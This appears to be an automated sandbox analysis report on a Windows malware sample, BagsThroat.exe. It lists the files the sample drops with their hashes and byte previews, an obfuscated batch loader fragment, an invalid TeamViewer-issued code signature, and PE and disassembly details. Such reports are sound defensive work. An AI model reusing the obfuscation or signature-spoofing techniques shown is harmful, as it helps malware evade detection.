                                      Preview:Detailed........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Heights

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):60416
                                      Entropy (8bit):5.097525223660272
                                      Encrypted:false
                                      SSDEEP:768:3OWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2P:35el3EYrDWyu0uZo2P
                                      MD5:9654140FA4C77C63096B201416F1B6A0
                                      SHA1:E26932966D4096D1C3DB68C17BA5ABE7AE6E6F27
                                      SHA-256:119DDE8D8A2A90FC2C5633C9CAAB0E1230B07CE8C73F24AE5C0D47EE2467AEE2
                                      SHA-512:4E09EE3E14CE914C73B9DD391B0DDE5F2E48066C8633B0B98CF76217DE4F3BA54D40088D919D89E202B121EA9ACB208ADB6AB702A1771B96FC89DFB70C7C7939
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Managers

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:DOS executable (COM)
                                      Category:dropped
                                      Size (bytes):132096
                                      Entropy (8bit):6.599505380219873
                                      Encrypted:false
                                      SSDEEP:3072:mhVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOo:p6AUkB0CThp6vmVnjphfhnM
                                      MD5:77A100D004A446BBBEC4DDC74721973A
                                      SHA1:13A1C66DE03F68D2B0FD59976B249921BA928A69
                                      SHA-256:48866DA93E4A8A20F0CAF75D87820A9E3975736CB52DFF724FCFB9C7F1CB6B7A
                                      SHA-512:276D2047450B656CD5970A0B4E21FBAC515EA12FF0D51A0C1D7B28F07024A699555C781EA74E3EBB6CE36F6B95FB88390F95DD73AE0C167EAD868532EEA0F4F5
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:.!.u.."........E..p...V.0.!...;...._^..[....U.....E.SVW.p..8..V.M...*..YP.M...k...].3..t...+.G...9......D.....;.r.M.VS......M.;.....E..).u.j.Q.;*..S.|*...E...._^[....U..V..f...F......LH..j..I*..Y.M.......^]...U....SV..M.W.^.S.}...3...t1W.......f.8.u.j..M......W........M....P....G;.r.E.;.t.P...;....M......_^[..U..4.....K..SV........P......*..............P.......YY......P......P..(.I...u;8E.tZ......P......P.}..YY..............P......P.. .I.............p.....t........a.....t..}..u?2.^[.......P.M......M........M.............u.............t.......h.xL.P...........P..t..3.f..E..........P..t..3..E........f..E...........E......E.3..E.E..E.E.....f.E.E.P....I.....?......:...U.......SV..3.W.M.]....5....M..-....M..%....U....~...U.....~...U..M.......M.E..8.....xL...t.V.M......M........t.V.M......M.......M......S.E.SP.U..M...|.......8...P.u.....I.....E......+....=..I.<.........8............d...P.M.......E.P.U..M..T...Y.M..s....E..M.E.E..E..E.E.E.E....E.P.j.....d...P.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Michael

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):128000
                                      Entropy (8bit):6.657700906171978
                                      Encrypted:false
                                      SSDEEP:3072:H4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHR:YClbfSCOMVIPPL/sZ7HS3zt
                                      MD5:42C917242AE3AE7A388678F5C63ADADE
                                      SHA1:6613748AD771CACAE32BC8FAF98898EC1D943602
                                      SHA-256:CDCADA29E45A10FA53C557BB96613A119EB893648B24B4C243027DAFD637DCD2
                                      SHA-512:3989C2E516EFFD9D18F71E6FFC5B62778AE31C37EBFA0AA23A4792505158D8D6D1EA93D5AB82B3E9477546F03FEC6B600F4B9F49082BE452BC520004866E8BDE
                                      Malicious:false
                                      Preview:d"M.Pf9.\"M.u....`"M.SP...b"M.P...^"M.P.v.W.....b"M.P...^"M.SSP.v.SW.......,.Oj.Xj.Z3.j.C_..k}.j.Xj._3.j.B[j.j.j.j.j.j.RPQj.j.....3.PPPj.PPSW.v.j.j..}.....X....L..=..L..N.;.}.;.|&;..";.~";.}.3.@_^[..].;.|.;...;.~.;.}.3...kF.<.F.k.<..i.....3.;.u.;5..L......;5..L.....SSSSS..o....U..QQ.e...}..VW.}.uySW.I...].....E.Y..t.....J.....l.J.WF....Yi.m.....j...6......Y...M.k..+.;U.......E....}..t.....J.....p.J.[...u*;.~&....!W..I.....E.Yt..4...J....4.l.J..u kE$<.E(k.<.E,i......E0.}..u..5..L....L..=..L._^..]...L..E.P.5..L.....Y..uDiE.........L......L.y....\&.....L.....\&.;.|.+.....L.....L..=..L..j.j.j.j.j..n....U....SV......e....e...E.P.]..B...Y.........E.P.....Y..........."M..u...t4....:.u...t..X.:Y.u.........u.3............D....].R..o..Y..Q...A..u.+.A.P."~..j..."M..o....."M.YY..........W.y...A..u.+.V.A.PR.n.............j._WVj@.3.................>.t.F...u..>-_....t.FV...Yi......M...<+t.<0|.<9..F..>:uBFV...k.<Y.M...M...<9..F..<0}..>:u.FV.a...Y.M...M...<9..F..<0}...t...M.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Overseas

                                      Download File
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):84992
                                      Entropy (8bit):7.998170672421689
                                      Encrypted:true
                                      SSDEEP:1536:/V/BDE7gSBN9z33cRA87hNwvOTO41OAClKfCArXtH2r:/V1E8SBncNhWgDyalU
                                      MD5:DAB5EB163EC9C442B8A3EF70CDA26541
                                      SHA1:401436FF0C3B3E635FDE5F4830E6769ADC5E487E
                                      SHA-256:D831091383DA89B8572C3B1846C69004415A0669581897551F65B40BBAAD8C1E
                                      SHA-512:31E4C2C9003F925523EDD4C95EF7E6198954AE899B6464FF82280F4CD7993A1C223073253972D90243CA1335E4E6E6DC02EA8E9B17A7A3D82DC28B3A28CFF3E3
                                      Malicious:false
                                      Preview:......S.DFC.X.CU.^.^T..*'.1G....f.*...<..p..*G.ES...F.6...z.../..<..n...v.-.s.U?..%....4P....*....YS............18.@ ..OS...".L.v6f.?S.o..H.\....B....E..x[..X.._..".m.#c.....l.c...0N{UE..dx...x.......&D:....@.i.E........:l.TM............n..=..&..W.p.~.mQ..U-u.>\a.........i..N...|.1m.J.ll.]a...f....Q....~......;...$.DEN..t..ia....,.3{[.+q....UN....4FE/.H@..i^P.<H.E.`....o.....=K......7.,.........\C.........`.1....S..V.Te...*.!....z...Q..n...2..R.I.X6$FAj*."....w...].$.x.......0G~...|D5..U.._?.o^o....."?. ....... .6...yU.N1.R....t2H.|.)t2W.....T..\<E3]..@.^.f.?.."..H..{..H"..N.1....O.,..1........}............S .....>q.o.M...pVp..)M.p/........_..r.7w.t....$..kKGp..E..*..x......_..A..<...k....qcVo......<.~$s8<..!.8V.....0...~/.......mAS ...'...z......r..l.DK....,.).E....}/.$....T.. ..\.._a...(.)=....H9.........z.....A..j.....r....Nm_;...'d=.B.^7..J....0. ..)L.8...F..(..D....... T..B.........{\.u.....S.."..@..o.....JIh.n.U......

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Plays

                                      Download File
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):59392
                                      Entropy (8bit):7.997100423038379
                                      Encrypted:true
                                      SSDEEP:1536:6E9aDkoEzjten+vPfTECrWiFwes9SY5En6Md4:6UtFLJCS7gf5O4
                                      MD5:9EEBCFD7BA6BA817EE8B455814E9DEC9
                                      SHA1:0A043727E47F66D6B163A826828C77AFB96284FA
                                      SHA-256:8A605DE35B83BE5823D1A971D126F0E3B1B4B768BB6F57D883D498F293EDA272
                                      SHA-512:0B6ADA25CCDFEA37130E220B9A9C02AB49E077F35FA4442CC16B8AED6D65007B4AD0AF28F4A520511B1098872BAB477DA24E63564E6B6CCE791BBE50193E971C
                                      Malicious:false
                                      Preview:.P..He.A.......z"$....>..'..'.b..M......./.S`..`+......T.w....w`.^}..n.'&.:b=j...Q...j..{H-j.c...G...5...>p..3b.B...!c....?.....uz^....G.....E.....(.%.:..r..y...Z...........Dn..+}../P..)....l....iy)m..m....G.....2...A.&.n. ....Q.?.....y.c... .~....3. .^.YT.Z....lCONL.......G.0..4j....)X...d....P........(l..].>A";...v-.X.....&..v...r.-o...d!c.-...8.d;...N....w.T.R~..S.......r.@.e.=..C.l.k.....G.ao....@`....J;.7|a.V....{..........8..1.....b2e..,...~..5...;B..Gb....|B.p....X.ehx.(h.W....c....p(R;_p~......l`.';....T.A.L...b.kA....C$.;T]M@.$.5tN8.......e....<..{..'..=..g......C..@.&.j.8.....+$...7.R.-...j.T..#...4|.s.$?&..GD0tI../..U.....b8..p.:.R......&wMn<..&.;..7...cAt.v)n.kB(..#i..DT}.K.2,..+.Y... w&.TsVLKX....;...NP.&c.5i~.......mh....+x.*x.<.......,xX.4. .......q...\SF..1.U.a...Wt.[{<.._[G....n.-N...m.U4D..1.ywU..'.............N.>.C..P..h..Q.......g~.o...i.c.p.9...+8..~....].. ..O.h...D...)..s....(2{$.\.2."0[r.e..i.....|ruM.. ....Re[K.{>\.)...C.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Pledge

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):94208
                                      Entropy (8bit):6.334063566470479
                                      Encrypted:false
                                      SSDEEP:1536:5dlDfFgQa8BpDzdZPp7HE+tKA3QkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPh:BdgQa8Bp/LxyA3laW2UDQWf05mjccBiX
                                      MD5:7495F417AB14F339A275C91E4AE3B32D
                                      SHA1:EF2B55D2044BC272B2162B6476AA8CF34E7D6372
                                      SHA-256:F675F15DF6F29F8DEE34C8C9581C88F87DB72606C78DDCB17DCF658158C47E79
                                      SHA-512:EB96B6D8C5D752E4D8C8D076D795E3FC0F385B60D22F1D8AE1142F728C790E2BEB13C59DC2C0D941C1F2E6DA56BC6DFD0BD609EC71A0E13D9AFA9785C16AE476
                                      Malicious:false
                                      Preview:........>...=..M.........?...=..M....4....=H..Q......D$..@......@..!...h..M..L$0.D$...........}..E....@.....L$,...\$x.............D$x.....F......N....=..M....#....<..Q.....C..C............9.A...A..UE...A...A.PVE..ZE...A...A...A...A...A.z.A.Z.A.(.A.\.A.|.A...A...A.h.A...A.lWE.~XE..XE..XE.rYE.M.A...........................................................................................I...A.v.A...A..`E..bE.#cE..cE.8.A...A..YE.>.A...A..ZE.-ZE.M.A.............................................|cE...A...A.GcE...A.gcE..cE..cE..cE..cE..cE.........U..VW.}...G..F....u....._^]...H...w..$.P.A..._..^]...j..~....W.........J..H..J..H..J..H._...F.^]....._..^]...j..F.........7.~..._..^]...j..+.........7...._..^]...j............7.Z..._..^]......A..dE...A...A...A...A...A..eE...A...A.UeE..eE..eE..eE.4.A.....U..U...T....R.S.].VW.....4...F.f..Ntx.].f..5...Q..f..G...Q...u.;.t5.F......%S...N.....=S.......IS..S...F........................vS...........iS..3._^[..]....E..@.......P...E........E......E....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Portrait

                                      Download File
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):99328
                                      Entropy (8bit):7.998121313681826
                                      Encrypted:true
                                      SSDEEP:3072:RZ2w0kQ1ORookGPUSSDQko2hgyQzOxLx+gfe:RtEMVkGPU/QkhlxLsgfe
                                      MD5:6244CF9E0B1F9729B1C027B6B26F6010
                                      SHA1:133A9E92565C0C9CB00D9F942DF95E43BDFC1911
                                      SHA-256:FC30514EB57F4693E5D719075AC7AD673C74E55612ED9F4597AF9E31B85F01D1
                                      SHA-512:ED1E1C228C8F2E847FAE2BCAE998501D249E856A60068188DFF69E6A6DC123BB129F67580C502EBF2C09A9EB0CB093773BE61BF66DA3AFEE184650149523E076
                                      Malicious:false
                                      Preview:2..)..QZ7B.......:z...`./.e...W......3j<n..(O.s#...Dz..A...F.7j-....KFM..]...S....!.jb80...u.(o........BK.`9GF.[S.mU...j...K..!..........r....B.)!....n7.i.q.tqpKof....J5:.i..A3..'5.Eq.>./._.e..z.=.v...\3L...Q=.J;v)...m8{..<...Ze..@1$..=..e..\w@.U=P.7............G.}..p@.|.._.S^.j.....'7t..bE.6h?.....?..-...^..'.[T^.l..F....r.....?.:gB..R..6...:Jg......{^.C1...a>I.P...........n.'Q..o)...........N..s.}.i..k........ .;......;.......U...S7.9.Q........K~J../.'......y_-8...E.~0]4.r&..V....&.#...d...R..v..8.gT..k....|v.n../..&.1m.......=..`Wr.k(...2.A5 I.FM>b......L.33..t...3.b.>..;.b..[.N.C...y0s.e.g...y.6P..[$%...lN.....B..PT|f.....3.$....{..;..#...S.f.M2..S..P.9Z.S...X.Y..s.eC-..P..,.z.o..1*...h..Ph:...n....yz%.P.em...9.[/:.I...C........D..T.u...w....~>..'...H..6jzp@.3VO...!N.#e]...t~CL...x.I.....K.>S...'...L...q:.t......r..W>......7xFFW........S..{+N.G...XFv.~...R.....V.K.g......R...\s.._!.&T..P.h.....~...aB.o,.G:zbX.........q....A...!.....dL.p....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Speeches

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):134144
                                      Entropy (8bit):5.353600638693791
                                      Encrypted:false
                                      SSDEEP:768:2U7aI4kCD9vmPukxhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtV+:himuzaAwusPdKaj6iTcPAsAhxjgarB
                                      MD5:89FA596A7CD363C2C2F82CE727082FAD
                                      SHA1:C789493A3D4106A038270A050A40B4E27A15A1DB
                                      SHA-256:BE4A5C0BAECD0DA597E797A87A98A8E58D8DCDF1B65CDC593932645CC0FA2706
                                      SHA-512:1F17A8BCE01308C80234E03AC89B31538E8FAA688D29797EFA8757DC25992EB3CB83699B029CF4C062C21899C709DE54BF965DDCB9F11DF0377E52825AA22FE0
                                      Malicious:false
                                      Preview:.K..??......?l......?.Z.3...?..;E<..?.fSOs..?.J.Q...?.z.L...?...@...?{yK+;..?.j.h..?..F...?-(.....?.n.....?@..F...?....)..?.P..J..?C..Si..?..^....?..B....?i|e....?.......?......?.a.k...?c......?X.!...?89.l!..?f.h.+..?....3..?)Ao.:..?.1(>..?..2:@..?>.?@@..?"I.r...?6..4...?..@...?.......?765@Z..?.&+-..?w.'....?...Q...?.Gp.t..?.2.&..?X..9..?B..q..?/.?....?v.....?..Mj$..?.3....?.s.....?.b...?V.....?.%..S..?V.....?.%@...?...U>..?2.,.|..?..m...?V..k..?..9....?.I.@.|.?..P.3y.?..?}>v.?..H|As.?#...<p.?._.0.m.?t....j.?.....f.?.....c.?..3).`.?....i].?...F)Z.?.2V..V.?..f\.S.?B?}.4P.?...V.L.?{...fI.?u.S..E.?|..uB.?1.<..>.?.(..b;.?...7.?.]o.-4.?.P.h.0.?...H.,.?.:5..).?I..\%.?f,..!.?.%...?N......?$..k...?.oay...?*......?..?Y...?...$...?.?.(...?...a...?.9y....?9..9R..?%..R...?F......?..@.I..?j. .T..?...0<..?.2.j...?.p.~...?.,.L...?@._.o..?7......?.'.....?.VG....?.D<xZu.?`\@..j.?)]G.q`.?.L.c.U.?.Jup.J.?CY...?.?..X7.4.?..T..).?KB..0..?&D...?lU.....?.E0d...?KYC....?.:.....?@.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Subjects

                                      Download File
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:ASCII text, with very long lines (1055), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):24638
                                      Entropy (8bit):5.1033772566503774
                                      Encrypted:false
                                      SSDEEP:768:i0Qhr+8ApRCzth0szdtSSg3YpG81Mk576kow:i5hrSUth0szdiy1Mk576kow
                                      MD5:9FE8970AD0AAD8E6887EC92CB186112A
                                      SHA1:4A440BAA4D53611E675B1D7F917CAEEE81CE3E33
                                      SHA-256:F259A1C6D1E9D0E2C7B68CABD9080B0F42A0F95B2043DD52346EDA6A6DF9816C
                                      SHA-512:7C1FC3D142E9DBD0CD6E2B1862EA6847A82AD18E91284FD9C9A2B1DD4193FAB0929F7BF9982EF8D63745C759E803C518D1305D61B700BBFE6E15FB946AFAD3EE
                                      Malicious:false
                                      Preview:Set Harley=T..NeOQLime-Antarctica-..MSRIntel-Bermuda-Commissioners-Rg-Follows-..eQylCondition-Easy-Slight-..dcSpeaks-Money-Title-..gZStands-Receivers-..eEnBRealtors-Albert-..uQPolar-..Set Shaw=X..iVgcKansas-..tbknBowling-Sisters-Lectures-Buyer-Under-Prefix-Filename-Muslim-Viking-..HYvOut-..eUNRear-..yqyComplex-Tba-Blah-Innovations-Milfs-..QEetTechrepublic-Creating-Animal-Paris-Painting-Undergraduate-Occasions-Drives-Evaluate-..Set Throat=U..wAILatvia-Presentations-Finals-Latina-Pay-Yes-Nicole-Strict-Pirates-..ibaExt-Course-Likes-Nathan-..ZdYu-Tour-Snow-..QYecEssence-Promising-Returning-Triumph-Potato-Deadly-Monte-..ChNCreations-Drug-Secretariat-Omega-Bermuda-Atlantic-Considerable-Zambia-Includes-..JGhHygiene-Poll-Wi-Complexity-Output-Significance-Described-..RMEnWing-Updating-Bald-Overhead-Relative-Mike-..Set Beat=8..MiauApplicants-Yorkshire-Upskirt-Rays-Alone-Terrorists-Substantially-Birmingham-Diary-..ObtOBaghdad-Llp-Silk-Stations-Bon-Mac-Ruled-..pHcQLimiting-Permits-..FSMariah-Subli

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Subjects.cmd (copy)

                                      Download File
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with very long lines (1055), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):24638
                                      Entropy (8bit):5.1033772566503774
                                      Encrypted:false
                                      SSDEEP:768:i0Qhr+8ApRCzth0szdtSSg3YpG81Mk576kow:i5hrSUth0szdiy1Mk576kow
                                      MD5:9FE8970AD0AAD8E6887EC92CB186112A
                                      SHA1:4A440BAA4D53611E675B1D7F917CAEEE81CE3E33
                                      SHA-256:F259A1C6D1E9D0E2C7B68CABD9080B0F42A0F95B2043DD52346EDA6A6DF9816C
                                      SHA-512:7C1FC3D142E9DBD0CD6E2B1862EA6847A82AD18E91284FD9C9A2B1DD4193FAB0929F7BF9982EF8D63745C759E803C518D1305D61B700BBFE6E15FB946AFAD3EE
                                      Malicious:false
                                      Preview:Set Harley=T..NeOQLime-Antarctica-..MSRIntel-Bermuda-Commissioners-Rg-Follows-..eQylCondition-Easy-Slight-..dcSpeaks-Money-Title-..gZStands-Receivers-..eEnBRealtors-Albert-..uQPolar-..Set Shaw=X..iVgcKansas-..tbknBowling-Sisters-Lectures-Buyer-Under-Prefix-Filename-Muslim-Viking-..HYvOut-..eUNRear-..yqyComplex-Tba-Blah-Innovations-Milfs-..QEetTechrepublic-Creating-Animal-Paris-Painting-Undergraduate-Occasions-Drives-Evaluate-..Set Throat=U..wAILatvia-Presentations-Finals-Latina-Pay-Yes-Nicole-Strict-Pirates-..ibaExt-Course-Likes-Nathan-..ZdYu-Tour-Snow-..QYecEssence-Promising-Returning-Triumph-Potato-Deadly-Monte-..ChNCreations-Drug-Secretariat-Omega-Bermuda-Atlantic-Considerable-Zambia-Includes-..JGhHygiene-Poll-Wi-Complexity-Output-Significance-Described-..RMEnWing-Updating-Bald-Overhead-Relative-Mike-..Set Beat=8..MiauApplicants-Yorkshire-Upskirt-Rays-Alone-Terrorists-Substantially-Birmingham-Diary-..ObtOBaghdad-Llp-Silk-Stations-Bon-Mac-Ruled-..pHcQLimiting-Permits-..FSMariah-Subli

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Theaters

                                      Download File
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):60416
                                      Entropy (8bit):7.997114737997307
                                      Encrypted:true
                                      SSDEEP:768:600vcxnlAKkulAtgFr/RZDY8NuLAK1hhDbn5vlAJf7kiqVxGuTF/Gjp9DbwLJ8:6ZvcTblAtCnDR8EKT6l+/bB/atbw8
                                      MD5:9B0C2C035ACAEB06132AB40F45EEA335
                                      SHA1:B103F8FC5D703990E588D21A798BF6572B841B64
                                      SHA-256:335153E166D777C3CF61F3B52EA12D26C2EACDB22307CD0A72321844D959FB96
                                      SHA-512:F655E4EABAC5354F73B59E445DF22DC8078C9110AA2443CF85441EB38DAF7F9999FF7CD9FADC9E946CAD5362948DDC9D3990726E270C59066BB7A7924DC0F897
                                      Malicious:false
                                      Preview:g.;A=.>...m...O,.K.....dA....U....>.a.bKQ...b..H_L#..v....~..2.LhM~.. N......3..fU.w.+,...ar.F..L..#...*...EJ.m..Ji.|.<Vk..]....J..O...,.."Gmrz[o;."B..u..g.+T_..K...i?...\..1......l....M{ ....~@M.$.H...>.d.L.=....a0........yn0i(..n...(...(c...R. .5)..O.}^..1...(....h..}/G2WO5!8.....I0["......8.R....*....nN...R:(..l$..bM...qC..@...V8.:A.J...B.(hD.....y.....C.<7..b...~.....2>.6... dW..=.!.=.....8.._{S.jD...V958l.Qe..>..P(..}..8.G......h.....*...._.RRMge.T.X..q~%...H.....A.....-k.X.z...Cp...j. \fj:..q.T......MCp.N....N...>x8.f..M~>O..C..........#)tt7kG9"x....n..U..m.....q..`n....k.G.y.........\.L...."(u.#.Dq...GA.4O[..&T8.s..T^?e+..f..'../...5.w.{..j*.a./V..U7......Cv....5@=Zz.U...xy)....(.....l..-..i.7..$/~......2f3..5..g|@.b..x.......I%e=...i.....sO...m.p.P.!..2|uajh.Z.JMF..3......az7.8..Z.8.+..X._......t.......O...I..].k.9E...<.V.i.%..O....A..Bt.9.....L...;.^Z.P..2..?.n...R9f"hDW..~..t1...#|..t....4.A.%...p.v.FS............bG.N.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tim

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):48621
                                      Entropy (8bit):7.036578405079938
                                      Encrypted:false
                                      SSDEEP:768:W9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:W9BGmdATGODv7xvTphAiPChgZ2kOE6
                                      MD5:2587810530100D2C69B7FD1FFB61A892
                                      SHA1:FA5AD55CE6DED5648F6EDB6AA18ECB2927908927
                                      SHA-256:76C61344973C451508B682AC19423A5C82D2A31A0807969C439FA7C739608E4A
                                      SHA-512:B90585691C8DEAD0C65B2CE2DC993CDFD5FC27E1E3EFCF58FBB306FE3E4DBBC73B166CD607038EB213710AFE2C1ABA9C3D2DAC86F0F8F9A115820956DA4A5C7E
                                      Malicious:false
                                      Preview:............................................................................................................................$.....................................|...|.......................................$.......................................0.........................e...]...]...]...]...]...]...]...]...e...........................0...............................%.....................g...]...]...]...]...]...]...]...]...]...]...]...]...f.......................%.............................................]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...].............................................................]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...................................%.................]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...................%.........................g...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...f.......................

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ve

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):78848
                                      Entropy (8bit):6.677457463606737
                                      Encrypted:false
                                      SSDEEP:1536:c/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyIL:cgF4qv+32eOyKODOSpQSAM
                                      MD5:6FFCF91F67AA7CB557BD6C15179997C2
                                      SHA1:004E56785762CCD06A3301832B2DEFE529195E60
                                      SHA-256:B4E8423BE7458A19EC3A50A5EA1029359766CA702F9A1C391E2DD00F14677516
                                      SHA-512:071AB42A94563CE04EC7D90FC103CC83658D0018B4DB74D119CEBF3A0375271E74425065B4A4B3FFE914C94C8342EFC0165988E8AF484883B693F4D647906344
                                      Malicious:false
                                      Preview:..v4....YY.F4.8-u..N @@.F4.V4..<it.<It.<nt.<Nu.jsXf.F2.z...B..u.+.._.V8^..]..V..W.v,..F1P.v..6.........~@..t9.F...F.S........@...u...P.......P.F8SP.h......[..t%.F0...........u...F...F..@....F8............t....~4.._^.....U..QSV..W.F<..F...F..v,..X...F2P.v..6.x.......~@..u2.......]..E...u...F.P...p..E.PQ........y..F0...........u...f..........t....~4.._.F8....^[..].....U..SV...v,.....Y.....tx...tVI...t3...t..8n.........@...2.......F .F........F..H..P..X.F .F........F.t..@..?.H.3..;.F .F........F.t...@..!..@....F .F........F.t...@.....@....W.~ .......t.....|...s........@.~ .~(._}..F(.......f ......9F(~..F(....u..f ..u..u....u.RQ.........Q...[....F .....t..~8.t..F4.80t..N4.N4..0.F8..^[].....V..W.F...F..x.......u...m.............2..D.v,.k...Y...t+...t.H...t....u.F.....W....F.....f.F.f.....F....F0..._^.Q .......t.......Q j.j..$....j.j..A(.....A,...........SV..W.F...F..~(.X..^4...u.......v,..F1P.v..6.........t...u..F44.J.W.v4.F<........u..F4,.J.W.v4.M...YY_.F8..^[..SV..W.F.

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.965679971225888
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:BagsThroat.exe
                                      File size:1'112'940 bytes
                                      MD5:3b819d687b2bde89ade8eb1aeb4c6c5f
                                      SHA1:e77057a1143c44eaf281e5f1a65ddc19c0a7cb98
                                      SHA256:0158aa426fceb64ed638b0abddbb6e26dc0806938ad34246db7ff0088668a7ee
                                      SHA512:bd2d6f16863a3b18383ddfe255a74d7982ecef145c8235238a7ac54f75291a095b0f3bd8e876413ee8d18e2b8c31d95c86fd8291e5b7c8381e038fd900e45412
                                      SSDEEP:24576:yRUORgU9hMlqoD9peQJsAS7TPK7DG2bJ27ETvj/4tW/:OUO2U0qsrDsAq7Vec7ETDOW/
                                      TLSH:2C353342DEA4DC2AE9940D3224F99A219E3C3F216D77D65F0314CACF6D72781AD44BE2
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...8...B...8.....

                                      File Icon

                                      Icon Hash:2970d080e070b248

                                      Static PE Info

                                      General

                                      Entrypoint:0x4038af
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:be41bf7b8cc010b614bd36bbca606973

                                      Authenticode Signature

                                      Signature Valid:false
                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                      Signature Validation Error:The digital signature of the object did not verify
                                      Error Number:-2146869232
                                      Not Before, Not After
                                      • 04/05/2023 02:00:00 07/05/2026 01:59:59
                                      Subject Chain
                                      • CN=TeamViewer Germany GmbH, O=TeamViewer Germany GmbH, L=G\xf6ppingen, S=Baden-W\xfcrttemberg, C=DE
                                      Version:3
                                      Thumbprint MD5:0D637B42FF0AB3019673C4243305BD25
                                      Thumbprint SHA-1:777A41024CF413CCB49B3434565545C0D78D80E9
                                      Thumbprint SHA-256:3A0A9BD3CBF08E350DACBFCB54C53F00113D929DAD01AF4C9D5BFE37ACF9F352
                                      Serial:062EE3FD7CDC52097C1DA6AFA87C745E

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push ebp
                                      push esi
                                      push edi
                                      push 00000020h
                                      xor ebp, ebp
                                      pop esi
                                      mov dword ptr [esp+18h], ebp
                                      mov dword ptr [esp+10h], 0040A268h
                                      mov dword ptr [esp+14h], ebp
                                      call dword ptr [00409030h]
                                      push 00008001h
                                      call dword ptr [004090B4h]
                                      push ebp
                                      call dword ptr [004092C0h]
                                      push 00000008h
                                      mov dword ptr [0047EB98h], eax
                                      call 00007F0280C5E39Bh
                                      push ebp
                                      push 000002B4h
                                      mov dword ptr [0047EAB0h], eax
                                      lea eax, dword ptr [esp+38h]
                                      push eax
                                      push ebp
                                      push 0040A264h
                                      call dword ptr [00409184h]
                                      push 0040A24Ch
